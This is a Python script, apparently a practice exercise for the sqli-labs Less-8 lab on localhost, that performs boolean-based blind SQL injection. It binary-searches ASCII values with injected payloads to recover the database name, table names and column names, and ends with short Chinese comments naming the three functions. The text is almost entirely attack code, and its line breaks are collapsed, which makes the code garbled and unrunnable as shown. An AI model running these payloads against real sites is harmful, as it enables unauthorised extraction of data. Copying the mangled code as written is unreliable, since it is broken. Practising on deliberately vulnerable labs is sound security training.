from msilib.schema import tablesimport requests
from setuptools.package_index import user_agentdef getDatabase(url):dataname = ''for i in range(1,20):low = 32high = 128mid = (low +high)//2while low < high:payload= "1' and ascii(substr(database(),%d,1)) > %d-- " % (i, mid)res ={"id":payload}r = requests.get(url,params=res)if "You are in..........." in r.text:low = mid +1else:high = midmid = (low + high)//2if mid == 32:breakdataname+= chr(mid)print(dataname)def getTable(url):tablename = ''for i in range(1, 50):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'), %d, 1)) > %d-- " % (i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breaktablename += chr(mid)print(tablename)def getColumns(url,table_name):columnname = ''for i in range(1,100): low = 32high = 128while low < high:mid = (low + high) // 2payload = "1' AND ascii(substr((SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns WHERE TABLE_NAME='%s'), %d, 1)) > %d-- " % (table_name, i, mid)res = {"id": payload}r = requests.get(url, params=res)if "You are in..........." in r.text: low = mid + 1else:high = midif low == 32: breakcolumnname += chr(low) print(columnname)if __name__ == '__main__':url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8/index.php'tablesname= 'users'column_name='username'row="id=2"
getDatabase(url)
getTable(url)
getColumns(url,tablesname)函数getdatabase:获取数据库名字
函数getTable:获取数据库的表名
函数getlumns:获取数据库的列名